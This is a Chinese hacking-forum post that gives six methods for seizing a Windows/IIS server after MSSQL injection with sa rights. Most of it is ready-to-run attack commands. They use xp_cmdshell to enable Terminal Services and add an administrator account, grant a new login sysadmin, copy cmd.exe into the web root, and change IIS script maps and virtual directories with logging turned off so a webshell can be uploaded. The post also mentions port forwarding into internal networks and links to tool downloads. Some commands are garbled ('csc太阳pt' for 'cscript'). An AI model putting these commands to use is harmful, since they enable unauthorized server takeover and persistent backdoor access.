文章作者：linzi [混客联盟]
信息来源：邪恶八进制信息安全团队

mssql injection之sa的利用

数据库和网站放同一服务器：


方法一:


   开TS，加账户上去，具体语句如下：


;exec master.dbo.xp_cmdshell '@echo [Components] > c:\sql'
;exec master.dbo.xp_cmdshell '@echo TSEnable = on >> c:\sql'
;exec master.dbo.xp_cmdshell '@sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q'
;exec master.dbo.xp_cmdshell '@del C:\server'


Exec Master..Xp_CmdShell 'net user linzi 123 /add'


Exec Master..Xp_CmdShell 'net localgroup administrators linzi /add'


方法二:


用asp.dll解析jpg格式，然后通过上传点，合法的上传一个asp木马，主要是利用Adsutil.vbs


这个脚本来实现。


具体语句是:
csc太阳pt C:\Inetpub\AdminSc太阳pts\adsutil.vbs ENUM w3svc/3/root  得到其目录
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/3/Root/Sc太阳ptMaps ".jpg,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".asp,c:\winnt\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\winnt\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"


方法三:


加个system权限的用户，然后用查询分析器连接上去


具体语句:


;exec master.dbo.sp_addlogin linzi;--


;exec master.dbo.sp_password null,linzi,linzi;--


;exec master.dbo.sp_addsrvrolemember linzi sysadmin;--


方法四:


老洞新用.构造原始的U漏洞，然后用小金写的工具连接上去，实现上传


具体语句如下:


;exec master.dbo.xp_cmdshell'copy c:\winnt\system32\cmd.exe c:\inetpub\sc太阳pts\linzi.exe'


方法五:


利用Adsutil.vbs建一个有浏览，写，执行等权限的目录，然后实现上传


具体语句如下:


csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs CREATE W3SVC/1/Root/linzi "IIsWebVirtualDir"
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AppIsolated 0
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/Path "c:\"
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessExecute 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSource 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessRead 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessSc太阳pt 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/AccessW太阳te 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/Sc太阳ptMaps ".asp,c:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE" ".aspx,c:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/DontLog 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDirBrowsing 1
csc太阳pt c:\Inetpub\AdminSc太阳pts\adsutil.vbs SET W3SVC/1/Root/linzi/EnableDefaultDoc 0


然后http://ip/linzi/登上去


方法六:


暴路径，然后，写入小马，或者上传一张图木马，然后再用copy命令把扩展名改成asp


具体语句如下:


1.暴目录:


;create table [dbo].[linzi] ([daya][char](255));--


;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into linzi (daya) values(@result);--


and 1=(select top 1 daya from linzi)


2.图片改名


copy 图片路径+linzi.jpg 图片路径+linzi.asp
面的六种方法，可以说是比较有效的六种，当然，对于sa入侵的方法五花八门，我个人是常用上面几种，因为上面
的几种方法，对于大部份的网站已经够了，好了，有时间继续写数据库不是放在同一服务器的攻击方法。
累啊！~~~
详细看我做的几个动画，我个人常用的方法是先开Terminal Service，然后再写入down.vbs,再上传一个端口转发工具，如htran，转发到公网，直接登陆，动画里有。

动画下载:
http://www.cnbct.org/bbs/dispbbs ... mp;ID=52&page=1

方法二见讨论的地方

端口转发入侵内网:
http://www.cnbct.org/VIP-DOWN/入侵内网.rar
U漏洞的新用:
http://www.cnbct.org/VIP-DOWN/sa-up.rar

下不到动画..555.ban没有给我论坛内部的权限...